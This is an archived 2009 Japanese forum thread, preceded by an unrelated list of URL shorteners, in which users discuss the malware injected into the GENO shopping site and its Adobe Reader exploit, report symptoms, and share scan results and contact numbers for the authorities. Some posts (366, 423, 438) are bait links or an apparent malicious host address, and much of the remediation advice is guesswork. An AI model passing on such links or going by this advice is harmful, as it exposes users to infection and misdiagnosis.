Ama_short(あま・しょーと)URL−amazon.co.jpの長いURLを「ギュッ」と短くするURL圧縮・URL短縮・URL変換・URL転送ウェブサービスです。
究極の短縮URL - xurl.jp 短縮URL http://xurl.jp/ ****'?'や'%'など余計な記号は入りません。携帯に対応
http://jpan.jp/ 短縮URL http://jpan.jp/?****希望するIDが可能な短縮URLサイトです。
2ch2@短縮URLサービス 短縮URL http://2ch2.net/.l?=***** URL自動作成
http://32url.com/ 短縮URL http://32url.com/?**** URL自動作成されます
むぉ〜ぶ 短縮URL http://mo-v.jp/?**** URL自動作成されます
kandou.biz 短縮URL サービス停止?
mooo.jp 短縮URL http://mooo.jp/****URL自動作成
エフエムセブン ドットビズ 短縮URL http://fm7.biz/***URL自動作成
SnipURL http://fw.iclub.to/ID URL自動作成or希望のID作成短縮URL
mixi専用 Bit URL Generator 短縮URL http://mixi.bz/* URL自動作成
ust.as 韓国語・英語・日本語の短縮URLフォーム有り 登録制
ESTYLE メルアドの取得ができる短縮URL http://www.estyle.ne.jp/****/
URL転送サービス http://fw.iclub.to/ID/ を取得できる短縮URL
JGGJ.NET Yahoo!に登録されている短縮URL 5種類の転送方法を選択できる
SmarTrans - www3.to 無料URL転送サ-ビス www3.to/***短いURLです
5jp.net http://5jp.net/*** を取得できる短縮URL
URLを短縮化するサイト http://jpan.jp/?**** を取得できる短縮URL

320 : SM-3(福岡県):2009/04/05(日) 13:46:32.18 ID:l4/7N6fi
サウンドハウスで流出あったのか
あそこクレカ支払あったら便利なのにとか思ってたけど、そういうことか。

321 : 市民団体(神奈川県):2009/04/05(日) 13:48:08.53 ID:aWIwhXus
>>313
【最終アクセス日(時)】 4/4 9時くらい
【サイトアクセス時の異常な反応の有無】 メモリ不足
【サイトアクセス時のAdobe readerの起動の有無】 無
【有の場合、その起動時の状況】 -
【その他アクセス時に異常な反応があれば、その詳細】 -
【その後のPC/OSの挙動の変化】 無
【cmd.exe常駐の有無】 無
【u.batファイルの有無】 無
【その他】 -

【セキュリティソフト/サイトでのチェックの結果】 感染なし
【インストールしているアンチウイルスソフト/DAT作成日】 AntiVir
【アクセス時に使用したブラウザ/ver.】 GoogleChrome 1.0.154.53 シークレットモード
【Adobe Readerのバージョン・JS使用設定の有無】 9.1.0/有
【OS】 XP SP3 (32bit)

DAT作成日って何のこと?

322 : 九条(catv?):2009/04/05(日) 13:49:06.25 ID:6NaUV3sx
とりあえず、ブラウザ落ちた=感染ってことでおk?

323 : PAC-3(アラバマ州):2009/04/05(日) 13:49:10.97 ID:nGBwdfjj
lynxで踏んだけどなんともなかったよ!
開きたい奴は仮想PCで開けよ、MSが無料で公開してるだろ

324 : PAC-3(関西地方):2009/04/05(日) 13:50:00.88 ID:3U7OVFzS
サウンドハウスの時と比べると今回は盛り上がりにかけるな。
まああっちは利用者数の多い優良店だったからショックがでかかったんだろうが…

325 : PAC-3(千葉県):2009/04/05(日) 13:52:54.06 ID:9Adf0bya
>>324
成績が良い子が万引きして捕まった時の周囲の反応の大きさと、
元々素行不良だった子が万引きで捕まった時に周囲からスルーされまくりな場合の落差と同じ構図だなw

326 : PAC-3(大阪府):2009/04/05(日) 13:52:55.81 ID:+16zvo/j
このスレ見て急いでWindowsUpdateとreader・playerの更新した
普段からよく見てるサイトだったしν速で先に知ることが出来てよかった

327 : PAC-3(長崎県):2009/04/05(日) 13:53:18.31 ID:FOmftALb
GENOを見たとき落ちなかったけど
ウイルス検査しているときに
ブラウザが落ちた

これもアウト?

328 : SM-3(福岡県):2009/04/05(日) 13:53:46.54 ID:kxRZ5V6k
ふんだけどなんともn・・・あれ知らないうちにブラウザが落ちてた

329 : 遺憾の意(関西地方):2009/04/05(日) 13:53:47.46 ID:PJg+3svG
サウンドハウスは被害の範囲が判ってさらに盛り上がった
クレカ(で買った人は)番号にメアド・パスワード全部流出
んで、他のサイトで同じパスワード使ってた人に被害が拡大

genoはまだ被害の範囲が不明

330 : 九条(千葉県):2009/04/05(日) 13:54:10.48 ID:ICQ6VfSj
必ず堕ちるならアウト

331 : PAC-3(岡山県):2009/04/05(日) 13:54:12.51 ID:crcD9GoP
別に危険じゃないだろ・・・

こういうレベルで危険とか言っちゃう奴って、頑張って勉強してavast入れてる初心者とか
周りの人間がノーガードや期限切れのノートンとかで当たり前って人種?

同じν速民として恥ずかしいわ


332 : SM-3(静岡県):2009/04/05(日) 13:57:16.84 ID:e/zzqqDE
>>324
クレカ絡みもあったからな・・・

333 : PAC-3(栃木県):2009/04/05(日) 13:57:51.67 ID:N+VV7PEy
恐いからwgetで開いたけどまだ怪しいコードが隠れて入ってるし・・・
javascript切っとけば大丈夫そうだけど

334 : SM-3(コネチカット州):2009/04/05(日) 13:58:15.09 ID:rB3rZQMK
>>324
しかもあっちは仕込みがチョンだったからなあ

335 : PAC-3(千葉県):2009/04/05(日) 13:58:24.15 ID:9Adf0bya
>>329
ここまで完全にGeno側がスルーしまくりなら
本気でIPAの岡ちゃんに全力で働いてもらうしかないかも知れないなw

336 : PAC-3(東京都):2009/04/05(日) 13:58:33.17 ID:/V7w2/WB
最低限のことをやらないGENOちゃんは最低だと思いますぅ

337 : PAC-3(長崎県):2009/04/05(日) 13:58:46.21 ID:MTlb6rGn
>>325
全く以てその通り

338 : PAC-3(アラバマ州):2009/04/05(日) 13:58:51.60 ID:nGBwdfjj
genoで買い物した人はほぼ確実に情報が漏洩してるからな…
他人事だからいいけど、こええな

339 : 市民団体(大阪府):2009/04/05(日) 13:59:36.18 ID:DPeUBUZG
とりあえず踏んじまったやつは再起動の前に1日前から新しく出来たファイル
やフォルダ全消しするぐらいの知能は持ってないのか

340 : SM-3(東日本):2009/04/05(日) 14:00:16.07 ID:MRFRGNV7
Adobe Reader/Acrobat 8.1.2に関するセキュリティアップデート公開
http://www.adobe.com/jp/support/security/bulletins/apsb08-15.html

↑おいらはもろ8.1.2だったからなぁw

不正なコード実行とかアプリケーションクラッシュとかのバッファオーバーフロー的なもの ・・・だけであることを祈っとるぞ!
こりゃ元捜査一課の田宮にプロファイリング依頼するしかねーな

341 : SM-3(埼玉県):2009/04/05(日) 14:00:24.53 ID:4UO/ejzT
さすがにgenoで買い物するなら秋葉行ったほうが安いんだよな

342 : PAC-3(東京都):2009/04/05(日) 14:01:41.28 ID:/V7w2/WB
メール会員の情報が漏洩してる可能性も
まじめに個人情報を登録していればの話だけど

343 : SM-3(catv?):2009/04/05(日) 14:04:26.56 ID:sC3uBjgu
>>339
全消しするようなやつも知能あるとは思えんがw

344 : SM-3(長屋):2009/04/05(日) 14:06:04.01 ID:ttK+ILeo
GENOはクレカ扱ってないから良かったな

345 : 市民団体(大阪府):2009/04/05(日) 14:06:31.72 ID:DPeUBUZG
>>343
まあ全けしは大げさだけど自分でファイル検索をなぜ先にせんのかと

346 : SM-3(茨城県):2009/04/05(日) 14:08:35.43 ID:Ae0TrC5I
Adobe Readr 6.0.1なんだど古すぎで感染しない?
プラウザは落ちないんだが

347 : SM-3(アラバマ州):2009/04/05(日) 14:09:48.00 ID:440uQoQF
>>340
犯人はラトビア人またはラトビアの鯖を踏み台にしたラトビア人以外の人間で、性別は
おそらく男。またはPCに詳しい女性の可能性もある。
年齢は20代から30代、もしくは40代から50代の犯行。あるいは最近は若年層でもこうした
犯罪を行う者が増えている為10代の可能性もある。
被害に関しては個人情報漏洩の可能性はないとはいえない。

348 : PAC-3(静岡県):2009/04/05(日) 14:10:09.35 ID:uRC10aLH
>>50
GENOの新品を買ったら欠品があって微妙に使った跡があった
売王の同じ物で値段はGENOより安いアウトレットを買ったら新品未開封のが送られてきた

349 : SM-3(埼玉県):2009/04/05(日) 14:11:22.55 ID:eAmdwIH9
>>338
名前と住所とメアドかな。


…2月に買い物したときのメールを見ると('A`)

350 : PAC-3(北海道):2009/04/05(日) 14:12:28.45 ID:SJFT5u/E
■GENO
電話 047-408-3363
メール http://www.geno.co.jp/webshop/before.html

■IPA
電話 03-5978-7509 ※ただし平日のみ
メール https://isec.ipa.go.jp/inq/servlet/InqMainServlet?id=frm0190

■千葉県警(GENO WEBの所在地)
電話 043-227-9110
メール https://www.police.pref.chiba.jp/mail/questionary/

■警視庁(GENO本社所在地)
電話(サイバー犯罪専用) 03-3431-8109
メール http://www.keishicho.metro.tokyo.jp/anket/other.htm

351 : SM-3(埼玉県):2009/04/05(日) 14:12:36.44 ID:eAmdwIH9
ああ電話番号も書いてる…

352 : PAC-3(東日本):2009/04/05(日) 14:14:32.43 ID:G8lq9Cpn
いろんなスレで短縮URL貼られすぎだろ

353 : PAC-3(アラバマ州):2009/04/05(日) 14:18:29.09 ID:4KwzHn5A
踏んでみて、ノートン先生は何も言わなかったが
Acrobatが不正終了したとのエラーが出た
今トレンドでオンラインスキャン中・・・・

これが終わったらカスペの試用版インストールしよう

354 : PAC-3(埼玉県):2009/04/05(日) 14:19:53.70 ID:ChFo5dq/
>>84のosusume.jsとosusume_shouhin.jsのHTTPヘッダにあるLast-Modified

Last-Modified: Sat, 04 Apr 2009 08:48:49 GMT
Last-Modified: Sat, 04 Apr 2009 08:48:51 GMT

昨日の夕方5時48分からかそのままか

355 : PAC-3(アラバマ州):2009/04/05(日) 14:20:43.02 ID:6qNnCYZc
geno-web.jp鯖には問題のコードは無くて悪質なコード自体は>350のgeno.co.jp鯖に置いてあるファイル。
なので>350のGENOを踏むとHTMLにコード埋め込まれてるので(ノ∀`)アイタタ

356 : PAC-3(北海道):2009/04/05(日) 14:20:59.31 ID:6yDN3pMg
>348
売王って胡散臭いサイトの割に意外といい感じ困る

357 : PAC-3(東京都):2009/04/05(日) 14:21:43.27 ID:/V7w2/WB
GENO秋葉原店 03-3252-9565

連絡がつかなければ、担当違いだけど秋葉原店に


358 : SM-3(島根県):2009/04/05(日) 14:21:55.65 ID:YMtKXXGZ
金曜深夜に登録して注文してしまった('A`)
土曜朝ぐらいに感染?

359 : PAC-3(長崎県):2009/04/05(日) 14:22:49.71 ID:MTlb6rGn
>>347
鋭い分析だな

360 : SM-3(東日本):2009/04/05(日) 14:25:39.12 ID:MRFRGNV7
>>355 あそこgeno以上に怪しいから触れてなかったけど、アマゾンにも出店してるし、意外と信頼性はあるのかもしれん・・・

361 : SM-3(福岡県):2009/04/05(日) 14:27:28.38 ID:cH/yn/ac
>>347
田宮△


362 : 遺憾の意(富山県):2009/04/05(日) 14:28:00.86 ID:qHl/Fgrx
昨日昼頃にGENOを見てadobe 8.13のオンラインアップデートが
起動してたのに気づいてから半日放置してた。
でもfirefox2もOSも全く重くならなかった。搭載メモリは4GB。

その後確認のためにadobe reader8.14でアクセスしたら、readerがメモリ食いまくってた。
システムの復元、ウイルスセキュリティ0とAVASTでフルスキャン。
変なexeは接続直後も今もこれといって動いてない。

怖すぎる

363 : SM-3(アラバマ州):2009/04/05(日) 14:28:09.66 ID:IS7Wlo3y
習志野警察署(GENO WEB店 管轄)
275-0015
千葉県習志野市鷺沼台2-4-1

電話 047-474-0110


364 : SM-3(東京都):2009/04/05(日) 14:28:35.34 ID:+nt63Y/G
IE6→無反応
Opera@USB→無反応
Firefox→このページを表示するにはプラグインを追加する必要があります
PortableGoogleChrome→表示するのにプラグインの追加が必要なコンテンツがあります

このプラグインがヤバイのか?

365 : SM-3(千葉県):2009/04/05(日) 14:33:27.62 ID:uDBzE6A2
カスペエンジンで駆除も可能なニフティのオンラインスキャンをとりあえず置いときますね
http://www.nifty.com/security/vcheck/index.htm

366 : 市民団体(アラビア):2009/04/05(日) 14:34:27.42 ID:1Syn31QO
トップページだけ閲覧してみたが無害っぽい?
と、思ったがブラウザを閉じた後、PCが重たくなり
タスクマネジャを見たら怪しげな.exeが…

俺、\(^o^)/オワタ
http://go.2ch2.net/u/V2Afcq?mofu4_2137.jpg.html

367 : 市民団体(神奈川県):2009/04/05(日) 14:34:58.27 ID:aWIwhXus
>>366
巧妙に細工したgenoのサイトか

368 : SM-3(愛知県):2009/04/05(日) 14:37:34.94 ID:vXoNm6eB
>>347
60歳以上の人間と10歳未満が犯人である可能性を消すとはなかなか

369 : PAC-3(アラバマ州):2009/04/05(日) 14:39:00.46 ID:88g6Gap6
何故かメモリのコミットチャージが1.56GBも使用してて
感染した形跡がないのにおかしいな〜と思っていたら

RamPhantomが1GB使っててワロスwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

画像に騙されたw

370 : PAC-3(北海道):2009/04/05(日) 14:40:18.12 ID:siieqtSy
ゲロめ許さん
感染はしてないけど以前買ったときの個人情報は保護してくれるんだろうなコラ

371 : PAC-3(徳島県):2009/04/05(日) 14:40:55.43 ID:qBMLTRpS
>>362
トレンドマイクロのオンラインスキャンしてもなんもないんだよね。
マジで嫌になってるわ。。。

372 : SM-3(三重県):2009/04/05(日) 14:41:04.08 ID:gN5GNh7a
PSPで余裕でした(^o^)ノ

373 : 遺憾の意(関西地方):2009/04/05(日) 14:45:09.67 ID:PJg+3svG
>>366もgenoのサイトに飛ぶURL
アクセス注意

374 : SM-3(長屋):2009/04/05(日) 14:45:44.13 ID:v0YiXEB0
とりあえずwiiで見てみるかな

375 : PAC-3(東京都):2009/04/05(日) 14:46:22.41 ID:/V7w2/WB
ドリームキャストで見るのも忘れずに

376 : SM-3(埼玉県):2009/04/05(日) 14:47:01.80 ID:eAmdwIH9
PS3しか持ってない

377 : SM-3(熊本県):2009/04/05(日) 14:47:12.38 ID:RbtJqnj5
Adobe Reader 8.1.3入れてFirefox3.0.8で突っ込んでも何も起きないぞ
VistaSP1

378 : SM-3(長屋):2009/04/05(日) 14:47:22.35 ID:v0YiXEB0
>>373
報告乙
開いてしまう所だったww
これだから初心者はwww

>>375
ごめんもってないっすw

379 : SM-3(アラバマ州):2009/04/05(日) 14:47:25.70 ID:440uQoQF
>>362
俺もほぼ同様の症状。
FireFox3でgeno行ったら突然AdobeReaderの強制終了のダイアログが出て「なんぞこれ?」
と思ったけど特に重くもならず使用メモリ量も増えず。メモリは2GB。
で、adobeのオンラインアップデートが起動したけどいつも無視してるので気づいた時点で
終了。

その後このスレに気づいてシステムの復元、avastでとトレンドマイクロのオンラインで
Cドライブフルスキャンするも異常なし。

conime.exeが再起動後も自動起動されてるのが不気味。

380 : SM-3(アラバマ州):2009/04/05(日) 14:47:55.68 ID:o0tkYFrM
>>366
仲間増やそうとするんじゃねぇよw

381 : 九条(西日本):2009/04/05(日) 14:48:03.92 ID:UbjOSzjH
>>49
つよそう

382 : PAC-3(アラバマ州):2009/04/05(日) 14:48:11.44 ID:lomc4aBm
>>84
一番下のリンク踏んでみたら
ウチのacrobat 8.1.4が開いて中身の文字列が

WpO1iRPgw6lc4a

なにこれ

>>1のリンク踏んでも何も起こらなかった

383 : PAC-3(福島県):2009/04/05(日) 14:48:29.83 ID:ttZ+x1JB
W-ZERO3で踏んでみたけどサイトはマジで放置なんだなw
つかWMなら大丈夫だよね?

384 : SM-3(dion軍):2009/04/05(日) 14:49:19.92 ID:2bZ6N/4D
>>366
GENO見てから×ボタン余裕でした。

385 : SM-3(東日本):2009/04/05(日) 14:49:43.76 ID:MRFRGNV7
うひょ、久しぶりにIE6立ち上げたら、相変わらず固まったw FFは対策済みなのでおkだけどな
svchost.exeが8個一気に動いてるっw System Idol Process98%!!netstatでは例のIP出てこなかったぜぃ
うひょひょひょ・・・泣けてきたw IEキャッシュ消せばいいのか?まぁ滅多に使わんけど・・

386 : SM-3(岡山県):2009/04/05(日) 14:50:17.88 ID:hpRAds5S
普通のアンチウイルスソフトで対応できるようなら、これほど騒がれてもいないのでは?
何か対策しろよGENO。

387 : SM-3(catv?):2009/04/05(日) 14:50:26.00 ID:G3IZnl5U
>>369
ざまあ

388 : PAC-3(福岡県):2009/04/05(日) 14:53:07.16 ID:7fhJTyYm
昨日の昼過ぎに見たようだけどなんともないな
winupdate最新
adobeAcrobat入れてない
firefox3
noscript
メモリ増えたり強制終了もない
cmd.exeもconime.exeも動いてない


389 : PAC-3(アラバマ州):2009/04/05(日) 14:53:27.05 ID:3fuyKCnQ
>>367
>>373
おいおい、>>366はサイトじゃなくて、その画像だぞwww


390 : SM-3(dion軍):2009/04/05(日) 14:53:36.76 ID:WqEYmPnT
>>241
履歴を見たら昨日ここにアクセスしていたわ
昨夜IE6落ちまくりでwindows Updataにもつながらなかったけど、これのせいか?

391 : PAC-3(北海道):2009/04/05(日) 14:53:41.77 ID:SJFT5u/E
>>355
忘れてたわ
>>350のGENOのメールは代わりにこっちを
rakuten-support@geno.co.jp

392 : SM-3(長屋):2009/04/05(日) 14:56:04.90 ID:W2FUcYj+
>>389
ID変えてまで必死すぎるだろ

393 : SM-3(三重県):2009/04/05(日) 14:58:03.21 ID:gN5GNh7a
>>366
お前のディスクトップきもすぎワロタ

394 : 九条(福岡県):2009/04/05(日) 15:06:11.22 ID:FxWYTDzJ
>>366
JavaScript有効にしますか?って聞かれたんで「全力で」を押しました

395 : PAC-3(不明なsoftbank):2009/04/05(日) 15:07:18.57 ID:8QUHED5C
開いたけど何ともないぞ。

もしかしてfirefoxでアドイン入れてるからか?

396 : PAC-3(長屋):2009/04/05(日) 15:07:27.90 ID:20vWyBRj
>>366
>トップページだけ閲覧してみたが無害っぽい?
>と、思ったがブラウザを閉じた後、PCが重たくなり
>タスクマネジャを見たら怪しげな.exeが…
>
>俺、\(^o^)/オワタ
>http://go.2ch2.net/u/V2Afcq?mofu4_2137.jpg.html

アップデート後のAvast!だと「マルウェアサイトへの接続を遮断しました」と警告が出て、
ブラウザ自体も落ちないし、PFの食い尽くしもなくなった。

まあ、一応これでいいか。

397 : SM-3(静岡県):2009/04/05(日) 15:08:46.73 ID:cRXmGUte
DVD10枚くらい焼いた
火狐のバックアップも取ったしそろそろ逝くか
もっともサブPCがあるからそっちで遊んでいればいいだけだがな
だが、入れなおした後もろもろもドライバのインスコがめんどくさいなぁ
どこのどいつだよこんなことしたの。
責任取らせようかな

398 : SM-3(福岡県):2009/04/05(日) 15:09:10.04 ID:l4/7N6fi
んで、実際電凸したやついんの?

399 : PAC-3(埼玉県):2009/04/05(日) 15:10:45.68 ID:IWFHCTg3
これ嘘の激安情報書いて2ch中にコピペされたら
絶対俺踏んでたわ・・・マジ怖すぎるだろ

400 : SM-3(静岡県):2009/04/05(日) 15:12:38.42 ID:fTzsppHx
とりあえず暫くはzipスレの画像すら踏めんな

401 : 遺憾の意(dion軍):2009/04/05(日) 15:13:07.08 ID:sqUa3kEW
expert PDF viewerの俺様安心かと思ったら、
感染してた。ふざけんな。

javasはoffにしてたんだが、
9時タイムセールのフラッシュ踏んだからいけなかったんだな...

402 : SM-3(catv?):2009/04/05(日) 15:13:23.98 ID:G3IZnl5U
とりあえずzipスレとやらに貼りまくればいいのか

403 : PAC-3(静岡県):2009/04/05(日) 15:13:26.50 ID:uRC10aLH
>>397
nliteで統合すればいいじゃん

404 : SM-3(アラバマ州):2009/04/05(日) 15:14:31.40 ID:o0tkYFrM
>>399
その発想は無かった

405 : 九条(長屋):2009/04/05(日) 15:14:36.04 ID:Z8eSuUqc
とりあえずPDFをReaderで自動で開かないようにしとけばいいんだろ

406 : PAC-3(アラバマ州):2009/04/05(日) 15:17:31.26 ID:/rk0AKFi
GENO終わったな、こりゃ被害額億いくで

407 : 遺憾の意(埼玉県):2009/04/05(日) 15:19:05.87 ID:GW1OYdbR
>>405
そうだねもう来なくていいよ(苦笑)

408 : 遺憾の意(アラバマ州):2009/04/05(日) 15:20:12.29 ID:0V1/mYrh
火狐でプラグインを入れろとか出るけど如何なのよ?

409 : SM-3(神奈川県):2009/04/05(日) 15:20:27.42 ID:BDzFLV4T
>>402
まぁ削除人が動けば一発規制だとおもうがどうぞどうぞ

410 : SM-3(西日本):2009/04/05(日) 15:20:54.32 ID:b9JHg0nF
        lヽ ノ l        l l l ヽ   ヽ
  )'ーーノ(  | |  | 、      / l| l ハヽ  |ー‐''"l
 / P  | | |/| ハ  / / ,/ /|ノ /l / l l l| l  P ヽ
 l   ・  i´ | ヽ、| |r|| | //--‐'"   `'メ、_lノ| /  ・  /
 |  D  l  トー-トヽ| |ノ ''"´`   rー-/// |  D |
 |  ・   |/     | l ||、 ''"""  j ""''/ | |ヽl  ・ |
 |  F   |       | l | ヽ,   ―   / | | l  F  |
 |   !!  |     / | | |   ` ー-‐ ' ´|| ,ノ| | |  !! |
ノー‐---、,|    / │l、l         |レ' ,ノノ ノハ、_ノヽ
 /        / ノ⌒ヾ、  ヽ    ノハ,      |
,/      ,イーf'´ /´  \ | ,/´ |ヽl      |
     /-ト、| ┼―- 、_ヽメr' , -=l''"ハ    |  l
   ,/   | ヽ  \  _,ノーf' ´  ノノ  ヽ   | |
、_    _ ‐''l  `ー‐―''" ⌒'ー--‐'´`ヽ、_   _,ノ ノ
   ̄ ̄   |           /       ̄

411 : PAC-3(不明なsoftbank):2009/04/05(日) 15:21:20.77 ID:8QUHED5C
>>401
俺も昨日タイムセール踏んだんだけど
感染してないようだが・・・

どこ見たらわかる??

412 : PAC-3(アラバマ州):2009/04/05(日) 15:21:34.53 ID:nGBwdfjj
ブラクラと称されたPDFもここまで進化したか
泣けてくるな

413 : SM-3(長屋):2009/04/05(日) 15:23:43.72 ID:v0YiXEB0
>>411
geno-webのほうだけなら大丈夫だという話のようです

414 : SM-3(北海道):2009/04/05(日) 15:23:52.50 ID:vDuHDzy/
昨日geno見たんだけど
感染したかどうかわからない
どうやって確認すんだ?

415 : 遺憾の意(dion軍):2009/04/05(日) 15:23:55.92 ID:sqUa3kEW
>>411
a-squared Freeでスキャンしたら出てきた。

416 : SM-3(兵庫県):2009/04/05(日) 15:24:33.22 ID:FGHLVtOz
         /\____/\
        /         \
      / /・\  /・\ \
      | _  ̄ ̄    ̄ ̄_ |
      | _  (_人_)  _ |
      | _   \   |  _ |
      \       \__|   /


417 : SM-3(沖縄県):2009/04/05(日) 15:24:55.05 ID:yJmgwh3/
AntiVirは糞 消さなくてもいいのまで消す

418 : SM-3(アラバマ州):2009/04/05(日) 15:24:57.44 ID:URFZ3t0d
>>183
conime.exe ユーザー名で動いてるんだけどアウト?

419 : PAC-3(神奈川県):2009/04/05(日) 15:24:59.86 ID:YeG33oI8
ディスクトップw

420 : PAC-3(千葉県):2009/04/05(日) 15:26:13.98 ID:TUzJaVtn
>>418
何もしてないのに動いてるならアウト

421 : PAC-3(アラバマ州):2009/04/05(日) 15:26:43.17 ID:RtjrOMzC
>>418
        _,l;;;;;;;;;;;;;l,,_
      ,.r'´;:  八  '::..゙ヽ
      ,.'___ _立_ __;;ミ゙;、     フT
      l厄巳厄 i王i ,.巳厄巳l     夕 ヒ
   ,.-'l i,.:'  ヽ:.、 ;.:' ' ヽ |,.、  
   /{´iY´ヾーtッ-ヽ'' kーtr-,'´lri   _l_
   {_i,入::.. ` ̄ ̄,'i!ヽ;` ̄´ ゙::.}rリ    i,_
   ヽ_ノiヾ ;:. _ i': ll!:,ィ ._ .: j,ノ
  ッジ::;;| ,r'´;;:> ̄弋´;;::ヽ;r1:゙'イィ   ┬‐宀
  弍::::::::l i':;r'´ ,.-ーー-、.ヾ;:;i. |:::::::ス   ノ□隹
   彡;:::l l::l  '  ---;:, ゙ l::l |::;;ャ`   、
   ,r',广ヽl::l ::. .:   ゙:.  l:lノ^i`、   三刃
  ,イ(:::j   i::iヽ  :.    .: /l:l'" l:ヽヽ  口心
 |;:;.\\ l::l  ', :;:::..::. /  l:l,r''/;::;;|

422 : 遺憾の意(アラバマ州):2009/04/05(日) 15:29:37.01 ID:0V1/mYrh
俺、それ動いて無いけどスゲー不安だ

級にプラグイン入れろって出た時いれなくて助かったのか・・・?

423 : PAC-3(アラバマ州):2009/04/05(日) 15:31:16.51 ID:3fuyKCnQ
http://www.geno-web.jp/Goods/GA09073840
これ欲しいんだけど、今注文出したらアウトかな?

424 : PAC-3(東京都):2009/04/05(日) 15:33:10.80 ID:/V7w2/WB
水曜日前後に見ただけなのに、さっきconime.exeがあったからタスクマネージャで終了した

425 : PAC-3(埼玉県):2009/04/05(日) 15:33:28.25 ID:mJLYrE9p
>>418
それコマンドプロンプト起動したら一緒に起動して
コマンドプロンプトが終了しても動き続ける

426 : SM-3(東京都):2009/04/05(日) 15:33:38.39 ID:860lpsay
>>423
なにさりげなく出して踏まそうとしてんだよw

427 : 遺憾の意(関西地方):2009/04/05(日) 15:34:25.61 ID:PJg+3svG
ID:3fuyKCnQ

428 : 遺憾の意(dion軍):2009/04/05(日) 15:34:50.92 ID:sqUa3kEW
そういや、あのタイムセールページもなんでいちいちflash踏ませるんだ?
urlだけかいときゃいい話じゃん

429 : PAC-3(アラバマ州):2009/04/05(日) 15:34:58.62 ID:3fuyKCnQ
>>424
俺もあるけど、それってMS-IMEのプロセスだよね。

430 : PAC-3(東京都):2009/04/05(日) 15:35:00.03 ID:/V7w2/WB
なんだ、コマンドプロンプトを開くたびにconime.exeが起動するのね

431 : PAC-3(アラバマ州):2009/04/05(日) 15:36:06.22 ID:6qNnCYZc
>>413
geno-webのページを開くとjsやら画像やらをgeno.co.jpから引っ張ってくるからgeno.co.jpを開いてるのといっしょ。
かといってhostsファイルに書いてもフレームとかからgeno-webが引っ張ってきて表示しちゃう。
中の人がgeno-web内の問題を探しても見つからない。


432 : SM-3(東京都):2009/04/05(日) 15:36:21.63 ID:tVNuvX4K
google toolbarで"geno-web.jp"で検索掛けたら直で跳びやがったwww

俺もアウツ??

433 : SM-3(コネチカット州):2009/04/05(日) 15:36:22.04 ID:gabLk7Km
お前らゲノゲノいってるけど
他のサイト見ても感染する可能性もないことはないんだからな?

434 : SM-3(アラバマ州):2009/04/05(日) 15:36:24.25 ID:URFZ3t0d
>>420
>>421
>>425

さらに>>366踏んだ\(^o^)/
再起動で確かめて見る

435 : PAC-3(不明なsoftbank):2009/04/05(日) 15:36:26.51 ID:8QUHED5C
>>423
わざと見たくなるように仕向けるんじゃねえ
気になるなるなるなるだろうが


436 : SM-3(長屋):2009/04/05(日) 15:37:50.47 ID:v0YiXEB0
>>431
なるほどそうなんですか。
いやはや勉強になります。

しかし紙一重の所で助かった。
昨日の1時ごろには見て痛んだよなあ。

437 : PAC-3(コネチカット州):2009/04/05(日) 15:38:12.73 ID:8PAkSxw0
心配ならブラウザのお気に入りだけ残してクリーンいんすこ

438 : PAC-3(アラバマ州):2009/04/05(日) 15:39:37.01 ID:3fuyKCnQ
>>426
>>435
これ↓をIEの制限付きサイトに登録すれば無問題だぞ。
http://94.247.2.195/

439 : 九条(福岡県):2009/04/05(日) 15:39:45.00 ID:fPoRIsOp
報告 ブラウザはFireFox Adobe Readerのバージョンは8代で詳しいことは憶えてない

昨日の朝9時ぐらいにgenoを閲覧、その時にAdobe Readerの新しいバージョンが出てるからアップデートしろとのウインドウが出る
その時にAdobe Readerをバージョンアップ

そして今日カスペルスキーのオインラインスキャンを実行→スキャンの結果はウイルスの隔離ファイル、Symantec AntiVirus Corporate Edition\7.5\Quarantine\XXXXXXXX.VBNが三つ見つかっただけで他は無し
タスクマネージャーを見ても怪しいプロセスは無し

440 : SM-3(東日本):2009/04/05(日) 15:40:07.81 ID:cMOqdWaO
avast、昨日のウィルス定義だと反応しなかったが、今だと反応した。
再度avastでフルスキャン中・・・

441 : PAC-3(長屋):2009/04/05(日) 15:40:47.86 ID:uFWmaItI
>>366
これ開いたけど専ブラならセーフだよね?

442 : SM-3(長屋):2009/04/05(日) 15:41:02.73 ID:v0YiXEB0
今使っているのが
10年前のpcで98→xpのアップグレード
だからよかった。

一応バックアップは取ってあったんだけど

443 : PAC-3(不明なsoftbank):2009/04/05(日) 15:41:40.32 ID:8QUHED5C
>>438
おまえは絶対絶対絶対絶対信用しねえ!

444 : SM-3(東日本):2009/04/05(日) 15:42:59.14 ID:cMOqdWaO
>>441
専ブラジャーでもIEのコンポーネント使ってればアウチ

445 : SM-3(長屋):2009/04/05(日) 15:43:09.03 ID:W2FUcYj+
>>441
セーフ

446 : SM-3(三重県):2009/04/05(日) 15:43:22.23 ID:gN5GNh7a
>>438
これすげぇ

447 : 遺憾の意(長野県):2009/04/05(日) 15:43:33.38 ID:FR6ts5ho

ここ接続できなければセーフ。接続できたらアウアウ
http://127.0.0.1/

448 : PAC-3(神奈川県):2009/04/05(日) 15:43:41.36 ID:2VNVFXU0
avast今データベース更新したのでwebシールド、ネットワークシールド、標準シールド
の感度を高にして踏んでみたけど何も反応しない


449 : SM-3(長屋):2009/04/05(日) 15:44:06.04 ID:cNjK6wAc
>>440
俺もavastが反応した。同じくフルスキャンしてる。

450 : PAC-3(長屋):2009/04/05(日) 15:44:13.73 ID:uFWmaItI
>>444
今時IEコンポの専ブラなんてあるの?

451 : 遺憾の意(埼玉県):2009/04/05(日) 15:45:11.83 ID:GW1OYdbR
さすがAVASTだな
更新の遅さに定評のあるAVGは脂肪

452 : PAC-3(東日本):2009/04/05(日) 15:46:01.99 ID:mhUW5Rhl
>>447
俺専用ローカルブログが開くぞ

453 : SM-3(アラバマ州):2009/04/05(日) 15:46:02.94 ID:URFZ3t0d
起動が妙に遅い・・・アバストでフルスキャン中

454 : SM-3(アラバマ州):2009/04/05(日) 15:46:27.61 ID:AtMGdsyT
やはり信頼できるセキュリティソフトはカスペル先生だけ

455 : PAC-3(コネチカット州):2009/04/05(日) 15:46:28.70 ID:8PAkSxw0
なんでこんな騒ぐ奴いるんだろうな

456 : PAC-3(愛知県):2009/04/05(日) 15:46:37.14 ID:aaftgKGZ ?2BP(5334)
>452
インターネッツにうp

457 : SM-3(東京都):2009/04/05(日) 15:47:08.17 ID:860lpsay
今回はavastは鉄壁だな。
一方、aviraはクソの役にも立ってない。
ノートンとかNO32とかは有料のくせにてんでダメ。

458 : PAC-3(長屋):2009/04/05(日) 15:48:06.60 ID:uFWmaItI
